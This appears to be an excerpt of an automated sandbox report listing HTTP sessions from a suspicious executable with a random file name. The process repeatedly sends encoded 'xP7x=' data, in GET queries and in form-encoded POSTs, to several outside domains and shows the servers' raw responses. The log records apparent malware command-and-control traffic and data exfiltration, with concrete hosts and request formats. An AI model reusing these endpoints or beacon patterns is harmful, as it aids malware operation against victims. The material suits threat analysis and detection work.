                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                      Jan 8, 2025 16:13:40.001355886 CET234INData Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69
                                                                      Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.449854202.92.5.23803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:41.590441942 CET490OUTGET /cboa/?xP7x=af1TSyH9ZKWDWOLhq+7f7Nkki45aGMI6MbDiaGUzr5LnkxoPx276h77cE37euV2f02htPG9gF0GAKqxhPgTdZizK3lLDCsG8NLzHSA4XR2l55JJp9Jslyik=&F4=Q0yHy HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.thaor56.online
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:13:42.553694963 CET1236INHTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      content-type: text/html
                                                                      content-length: 1251
                                                                      date: Wed, 08 Jan 2025 15:13:42 GMT
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                      Jan 8, 2025 16:13:42.553709984 CET234INData Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69
                                                                      Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.449895194.195.220.41803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:47.747335911 CET770OUTPOST /0gis/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Origin: http://www.earbudsstore.shop
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.earbudsstore.shop/0gis/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 5a 71 54 36 57 38 75 78 30 44 48 39 7a 32 46 76 6c 38 4f 45 76 54 64 75 45 46 6a 42 32 4d 7a 2f 47 6e 6b 4c 52 6e 35 58 35 32 68 4b 67 4c 38 56 65 53 4d 31 36 49 49 6d 4e 6c 62 42 59 33 6d 59 6f 55 5a 4d 6c 65 65 57 56 45 62 4f 57 48 38 2b 51 4e 5a 69 39 41 34 73 53 34 57 54 4e 34 30 7a 51 78 67 64 58 78 32 54 50 58 4b 54 49 69 65 32 46 66 6c 6e 2b 49 35 68 66 41 4b 69 67 42 2b 69 43 77 41 33 34 6f 4b 6c 45 42 67 35 72 52 36 62 68 49 67 69 57 69 4f 2f 68 35 77 4c 6f 35 6f 4d 62 68 45 47 70 7a 4a 57 64 72 63 6d 43 33 30 47 34 57 30 42 44 67 3d 3d
                                                                      Data Ascii: xP7x=XOD8jI/m6V/6ZqT6W8ux0DH9z2Fvl8OEvTduEFjB2Mz/GnkLRn5X52hKgL8VeSM16IImNlbBY3mYoUZMleeWVEbOWH8+QNZi9A4sS4WTN40zQxgdXx2TPXKTIie2Ffln+I5hfAKigB+iCwA34oKlEBg5rR6bhIgiWiO/h5wLo5oMbhEGpzJWdrcmC30G4W0BDg==
                                                                      Jan 8, 2025 16:13:48.248037100 CET875INHTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 08 Jan 2025 15:13:48 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 61 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 5b 73 a2 30 14 80 df fb 2b 58 1e 3a bb 33 ab 5c b4 55 b7 d0 1d 7b d1 e2 60 ed 54 ab c2 4b 27 24 a9 89 0d 09 85 20 e2 ce fe f7 05 ec 56 76 ec cb e6 81 e4 9c 93 73 fb 12 62 7d b9 99 5c cf bc 87 5b 85 c8 90 5d 9e 58 e5 a4 30 c0 57 b6 8a b9 7a 79 a2 14 c3 22 18 a0 fd b2 12 43 2c 81 02 09 88 13 2c 6d f5 69 36 68 74 df 77 1e cc 44 ca a8 81 df 52 ba b1 d5 6d 23 05 0d 28 c2 08 48 1a 30 ac 2a 50 70 89 79 e1 eb dc da 18 ad f0 91 37 07 21 b6 d5 0d c5 59 24 62 59 73 c8 28 92 c4 46 78 43 21 6e 54 c2 77 85 72 2a 29 60 8d 04 02 86 6d a3 a9 d7 c3 49 2a 19 be b4 b4 fd 5c b5 53 15 c9 45 02 63 1a c9 43 5b 9f d7 1e e3 97 18 27 a4 56 82 7e 91 c6 cc 2e fb fb a1 69 59 96 75 f4 26 06 71 90 a2 24 91 22 c6 cd 84 88 48 53 15 ed 10 d9 d2 8e b3 59 15 c4 3a a5 e3 4c 67 ff 95 c9 d2 0e c7 64 05 02 e5 8a e0 4c 00 64 ab 48 3c ef 97 5f bf d5 d1 ec 01 28 32 8f 0a d6 12 6f a5 b6 06 1b b0 d7 d6 f6 95 5c 5e 52 0e 25 15 5c a9 85 52 7e 7d d0 2c b7 94 23 a3 1c 89 ac 29 45 d4 64 02 16 a7 2d [TRUNCATED]
                                                                      Data Ascii: 2ab[s0+X:3\U{`TK'$ Vvsb}\[]X0Wzy"C,,mi6htwDRm#(H0*Ppy7!Y$bYs(FxC!nTwr*)`mI*\SEcC['V~.iYu&q$"HSY:LgdLdH<_(2o\^R%\R~},#)Ed-x})}K_*uR|"[iv[m8+>uwW,So90wka8AZF=fjpdw;4l=kg%]"KU[>FaH m,z"2Y?LQp#(d;d[ x?ygzWG9x_!bwXq@Q4/oIEhW?9ggfF<"FYu[R,YZyAF?h~0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.449911194.195.220.41803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:50.300302982 CET790OUTPOST /0gis/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Origin: http://www.earbudsstore.shop
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.earbudsstore.shop/0gis/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 57 71 6a 36 46 50 47 78 6a 7a 48 38 76 6d 46 76 72 63 4f 41 76 54 68 75 45 42 37 52 32 5a 6a 2f 47 43 41 4c 4c 6d 35 58 36 32 68 4b 76 72 38 63 61 53 4d 75 36 49 45 55 4e 6e 50 42 59 33 69 59 6f 56 70 4d 6d 76 65 58 48 6b 62 41 65 6e 38 38 55 4e 5a 69 39 41 34 73 53 37 71 35 4e 34 63 7a 54 42 51 64 57 56 69 55 4a 6e 4b 51 42 43 65 32 42 66 6c 6a 2b 49 34 45 66 45 4c 46 67 45 69 69 43 78 51 33 35 36 79 6d 4e 42 67 2f 76 52 37 6c 73 6f 38 76 62 42 37 4b 6e 70 30 77 32 59 4d 37 58 48 4a 63 34 43 6f 42 50 72 34 56 66 77 39 79 31 56 4a 49 59 71 50 56 6f 30 38 58 72 65 48 49 73 36 71 54 48 55 76 62 47 7a 67 3d
                                                                      Data Ascii: xP7x=XOD8jI/m6V/6Wqj6FPGxjzH8vmFvrcOAvThuEB7R2Zj/GCALLm5X62hKvr8caSMu6IEUNnPBY3iYoVpMmveXHkbAen88UNZi9A4sS7q5N4czTBQdWViUJnKQBCe2Bflj+I4EfELFgEiiCxQ356ymNBg/vR7lso8vbB7Knp0w2YM7XHJc4CoBPr4Vfw9y1VJIYqPVo08XreHIs6qTHUvbGzg=
                                                                      Jan 8, 2025 16:13:50.819744110 CET875INHTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 08 Jan 2025 15:13:50 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 61 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 4f 73 a2 30 14 c0 ef fd 14 2c 87 ce ee cc 2a 08 b6 96 2d 74 c7 da 6a 71 b0 76 aa 55 e1 d2 09 49 6a 62 43 42 21 88 b8 b3 df 7d 01 bb d5 1d 7b d9 1c 48 de 7b 79 ff 7e 09 b1 bf dc 8c 7b 53 ff e1 56 21 32 62 57 27 76 35 29 0c f0 a5 a3 62 ae 5e 9d 28 e5 b0 09 06 68 b7 ac c5 08 4b a0 40 02 92 14 4b 47 7d 9a f6 1b 17 ef 3b f7 66 22 65 dc c0 6f 19 5d 3b ea a6 91 81 06 14 51 0c 24 0d 19 56 15 28 b8 c4 bc f4 75 6f 1d 8c 96 f8 c8 9b 83 08 3b ea 9a e2 3c 16 89 3c 70 c8 29 92 c4 41 78 4d 21 6e d4 c2 77 85 72 2a 29 60 8d 14 02 86 9d 56 53 3f 0c 27 a9 64 f8 ca d6 76 73 dd 4e 5d 24 17 29 4c 68 2c f7 6d 7d 5e 7b 82 5f 12 9c 92 83 12 f4 cb 2c 61 4e d5 df 0f 4d cb f3 bc a3 37 31 48 c2 0c a5 a9 14 09 6e a6 44 c4 9a aa 68 fb c8 b6 76 9c cd ae 21 1e 52 3a ce 74 f6 5f 99 6c 6d 7f 4c 76 28 50 a1 08 ce 04 40 8e 8a c4 f3 6e f9 f5 db 21 9a 1d 00 45 16 71 c9 5a e2 8d d4 56 60 0d 76 da 83 7d 15 97 97 8c 43 49 05 57 0e 42 29 bf 3e 68 56 5b aa 91 53 8e 44 de 94 22 6e 32 01 cb d3 [TRUNCATED]
                                                                      Data Ascii: 2abOs0,*-tjqvUIjbCB!}{H{y~{SV!2bW'v5)b^(hK@KG};f"eo];Q$V(uo;<<p)AxM!nwr*)`VS?'dvsN]$)Lh,m}^{_,aNM71HnDhv!R:t_lmLv(P@n!EqZV`v}CIWB)>hV[SD"n2IGQ>/is;UZ~"1ezu<S!NAL\[0zcz.CY,J7152E3a+U-X{KW1Q=<Ou_<^AOz~7:[g'8y0Xy&b>`".gAy{QNh0FWo>k!a-5z5cT/Q{Oj}V+>lFl7{|)cTu\w.7[.hhIs+0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.449927194.195.220.41803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:52.848522902 CET10872OUTPOST /0gis/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Origin: http://www.earbudsstore.shop
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.earbudsstore.shop/0gis/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 57 71 6a 36 46 50 47 78 6a 7a 48 38 76 6d 46 76 72 63 4f 41 76 54 68 75 45 42 37 52 32 5a 72 2f 47 78 34 4c 52 42 74 58 37 32 68 4b 6d 4c 38 52 61 53 4e 32 36 49 4d 51 4e 6e 44 37 59 31 4b 59 6f 33 52 4d 6a 64 32 58 65 55 62 41 53 48 38 2f 51 4e 59 6d 39 41 49 6f 53 34 53 35 4e 34 63 7a 54 48 55 64 41 78 32 55 53 6e 4b 54 49 69 65 36 46 66 6c 48 2b 49 67 79 66 45 50 2f 67 33 36 69 44 52 67 33 36 4a 4b 6d 50 68 67 39 6a 78 37 74 73 6f 78 76 62 42 6d 31 6e 71 6f 61 32 62 51 37 48 43 38 71 6f 52 41 66 61 4b 45 5a 63 42 51 58 2b 6d 6c 75 5a 72 36 67 6c 6b 49 66 33 4e 33 46 72 49 2b 57 44 42 75 66 59 7a 6e 6a 49 77 6d 69 35 35 55 44 51 47 68 4c 31 6e 4f 71 79 49 53 58 6e 55 4a 54 54 74 2b 35 39 75 76 79 78 75 69 71 42 53 6b 73 4a 52 54 6e 49 62 6e 4d 30 4b 72 49 68 71 47 57 49 79 46 62 6b 6d 39 44 4e 31 4b 54 70 46 49 72 49 75 57 51 77 61 44 7a 65 30 6d 59 35 71 30 6c 42 74 67 4b 41 75 68 70 43 62 75 4f 2b 62 7a 36 76 69 36 4a 41 4d 79 7a 64 54 61 78 43 [TRUNCATED]
                                                                      Data Ascii: xP7x=XOD8jI/m6V/6Wqj6FPGxjzH8vmFvrcOAvThuEB7R2Zr/Gx4LRBtX72hKmL8RaSN26IMQNnD7Y1KYo3RMjd2XeUbASH8/QNYm9AIoS4S5N4czTHUdAx2USnKTIie6FflH+IgyfEP/g36iDRg36JKmPhg9jx7tsoxvbBm1nqoa2bQ7HC8qoRAfaKEZcBQX+mluZr6glkIf3N3FrI+WDBufYznjIwmi55UDQGhL1nOqyISXnUJTTt+59uvyxuiqBSksJRTnIbnM0KrIhqGWIyFbkm9DN1KTpFIrIuWQwaDze0mY5q0lBtgKAuhpCbuO+bz6vi6JAMyzdTaxCyjw9qtuHZkRSB1fnwM7BJzRSDO3TOcpC4IcuUxnCtxHSbnWt1AWWJI39dLMH/5tfmf61la5zfN16KIDLY6jBCmlXJzGYqBjhMpxwA1nwmkj4nUpbRpkgfHkxILBmGDIPJh62BSM/6kmYC8F1D2DGzXyyKjvvzhjkNa+JMTbrcjQDQV3UMLajFKUOveDo64B2klfQ5crdmxJCGTf61g8cCOuM/NgCTbcwTwAmmnwzvRtqc7lZ9UUDhTNhyo8J/F99lWF4Y/IgYpxbwm1Lq1OfnocTaxwirI2N6cszZfpXTIkjv8XUYpl9md+AdjRIEWKfig0/jCKrrf9IVom7iI9SuTFFYhUXl150Vvt0/qB+8cqbHw2yjGnfQGt/ivenkUhJtMON9dLHpixl+/uLTKnbTaRaMgrlfCFuDvxW7NiV7Q2xvxhmkYzRi4OSVZL6jko6sFF3YyB4eDSMDArPbRF0Z5cYWfF8iR/um168Nek99g3e7yTqfzVhw5/Mhb319mpuK5sYQHYdp8kpO6dxkxmAguatqBTXUBqgXiZp6VqfCaLAt5+DgeFvOR05S6nBp18NfBYaRLE6F5LU+CohJk9RypI+qy+a08ggIehmsmQvVF8JImA8Ev3Cc6GWa1rfp0FUR2Q3hiucmmzUPPU97ZgCjWWIXKsrFtmpqs [TRUNCATED]
                                                                      Jan 8, 2025 16:13:53.346621990 CET200INHTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 08 Jan 2025 15:13:53 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                      Data Ascii: f


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.449946194.195.220.41803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:55.390995979 CET493OUTGET /0gis/?F4=Q0yHy&xP7x=aMrcg/vn2G/nVrncRMrksgj//l1iguTCuDhUOTj2ocWrQXkoPHFbln1FmLoTaWY74KRoWkXSZUSbj2dC1qWbbVz+e205UYRB0QccYqidFK5nXCUGR2PtEFk= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:13:55.916239977 CET1236INHTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 08 Jan 2025 15:13:55 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 35 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 65 61 72 62 75 64 73 [TRUNCATED]
                                                                      Data Ascii: 50a<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.earbudsstore.shop/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.earbudsstore.shop/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1736349235.9785162264&other_args=eyJ1cmkiOiAiLzBnaXMiLCAiYXJncyI6ICJGND1RMHlIeSZ4UDd4PWFNcmNnL3ZuMkcvblZybmNSTXJrc2dqLy9sMWlndVRDdURoVU9UajJvY1dyUVhrb1BIRmJsbjFGbUxvVGFXWTc0S1JvV2tYU1pVU2JqMmRDMXFXYmJWeitlMjA1VVlSQjBRY2NZcWlkRks1blhDVUdSMlB0RUZrPSIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGl [TRUNCATED]
                                                                      Jan 8, 2025 16:13:55.916256905 CET222INData Raw: 39 4d 43 34 34 4c 47 46 77 63 47 78 70 59 32 46 30 61 57 39 75 4c 33 4e 70 5a 32 35 6c 5a 43 31 6c 65 47 4e 6f 59 57 35 6e 5a 54 74 32 50 57 49 7a 4f 33 45 39 4d 43 34 33 49 69 77 67 49 6e 56 79 61 56 39 6a 49 6a 6f 67 49 6d 4d 34 4d 6d 4d 69 4c
                                                                      Data Ascii: 9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43IiwgInVyaV9jIjogImM4MmMiLCAiYXJnc19jIjogIjQyZTEiLCAicmVmZXJlcl9jIjogImY1YmUiLCAiYWNjZXB0X2MiOiAiNGNmYyJ9"; } </script> </body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.449981103.230.159.86803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:01.834741116 CET776OUTPOST /bwyw/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Origin: http://www.superiorfencing.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.superiorfencing.net/bwyw/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 34 32 45 46 33 48 6c 6a 65 4a 47 53 38 4e 69 33 70 6f 50 33 4e 54 6a 2b 6d 52 59 71 7a 41 2b 61 77 6a 47 5a 32 6f 73 31 4f 5a 43 6b 59 59 5a 57 37 36 47 46 45 66 78 78 38 4e 61 4f 44 47 7a 55 73 35 57 4b 59 49 31 68 53 49 66 66 42 78 56 33 4e 30 78 72 51 61 34 45 35 32 41 54 49 52 4b 72 55 35 56 71 45 36 6a 52 56 78 72 37 63 43 6b 4b 78 4f 57 6b 4d 5a 77 6a 4d 73 79 34 59 45 39 37 66 55 47 32 67 70 5a 46 71 6f 75 63 55 45 43 76 71 44 52 4d 64 37 38 47 6f 4e 2b 6d 73 61 64 32 47 61 37 79 44 7a 59 59 69 2f 4c 31 73 71 2b 35 4e 65 33 74 50 41 3d 3d
                                                                      Data Ascii: xP7x=+cCAFC3M4Oqm42EF3HljeJGS8Ni3poP3NTj+mRYqzA+awjGZ2os1OZCkYYZW76GFEfxx8NaODGzUs5WKYI1hSIffBxV3N0xrQa4E52ATIRKrU5VqE6jRVxr7cCkKxOWkMZwjMsy4YE97fUG2gpZFqoucUECvqDRMd78GoN+msad2Ga7yDzYYi/L1sq+5Ne3tPA==
                                                                      Jan 8, 2025 16:14:02.727698088 CET479INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:02 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
